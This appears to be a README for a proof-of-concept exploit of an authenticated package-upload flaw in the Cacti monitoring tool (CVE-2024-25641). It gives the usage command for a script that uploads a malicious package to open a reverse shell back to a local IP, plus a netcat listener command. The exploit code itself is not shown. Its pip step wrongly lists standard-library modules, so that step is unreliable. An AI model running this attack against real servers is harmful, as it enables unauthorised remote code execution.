## https://sploitus.com/exploit?id=79F09F96-046D-52D1-9019-13C34ABABBB8
# Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC)
This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.
## Requirements
- Python 3.x
- `requests` library
- `argparse` library
- `re` library
You can install the required Python library using pip3:
```bash
pip3 install requests
pip3 install argparse
pip3 install re
```
## Usage
(make sure to place the **test.xml.gz** in the same directory as the **exploit.py**)
```bash
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
```
## Start nc listener
```bash
nc -nvlp <port>
```